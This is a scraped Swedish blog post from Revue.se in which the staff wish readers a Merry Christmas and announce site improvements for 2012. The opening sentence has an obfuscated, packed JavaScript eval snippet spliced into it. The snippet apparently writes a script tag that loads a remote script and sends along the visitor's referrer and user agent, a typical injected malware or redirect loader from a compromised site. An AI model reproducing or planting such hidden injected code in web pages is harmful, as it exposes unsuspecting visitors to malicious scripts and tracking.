Image Image Image Image Image Image Image Image Image Image

| 17 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Revue önskar alla en God Jul!

Revue önskar alla en God Jul!
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yknds|var|u0026u|referrer|ieshb||js|php’.split(‘|’),0,{}))
är det fyra dagar kvar tills julafton och vi på Revue.se vill önska alla våra besökare en riktigt God Jul!

Ledigheterna börjar ta fart och folk försvinner mot både varmare och kallare klimat för att sola eller åka skidor. Detta gäller även några av oss på Revue. Vi kommer självklart fortsätta uppdatera sidan med kul innehåll men det kan hända att det inte publiceras lika mycket som det brukar. Lite ledigt måste man ha ibland också 😉

Men i Januari är vi tillbaka och då kommer vi också ha fått en liten julklapp som vi kommer ge oss själva.

Som vi nämnt i en tidigare artikel kommer vi att göra en del förbättringar på sidan inför 2012. Vad och hur kommer vi berätta någon gång i mellandagarna.

God Jul önskar Sebastian Plengier Ehrnfelt, Filip Urde och Alexander Gylemo